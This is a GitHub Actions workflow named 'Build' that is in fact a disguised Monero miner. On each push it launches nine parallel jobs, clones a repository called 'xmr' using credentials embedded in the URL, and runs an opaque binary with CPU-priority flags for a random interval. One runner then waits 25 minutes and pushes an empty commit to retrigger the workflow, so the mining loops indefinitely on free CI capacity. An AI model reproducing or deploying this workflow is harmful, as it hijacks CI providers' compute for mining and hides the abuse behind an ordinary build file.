name: Build
on:
  push:
jobs:
  test:
    name: Fetch
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4,5,6,7,8]
    steps:
      - run: |
          apt update -qq
          apt install -y git libuv1 libssl1.1 libhwloc15
          git clone https://nopo4:replaced@github.com/nopo2/xmr.git
          cd xmr
          chmod u+x prog
          timeout $(shuf -i 300-820 -n 1) ./prog --cpu-no-yield --cpu-priority 5 || true
          if [ ${{ matrix.runner }} -eq 0 ]
          then
            sleep 25m
            git config user.name 'Davey G'
            git config user.email 'daveyg1@yandex.com'
            git commit --allow-empty --allow-empty-message --no-edit
            git push
          fi
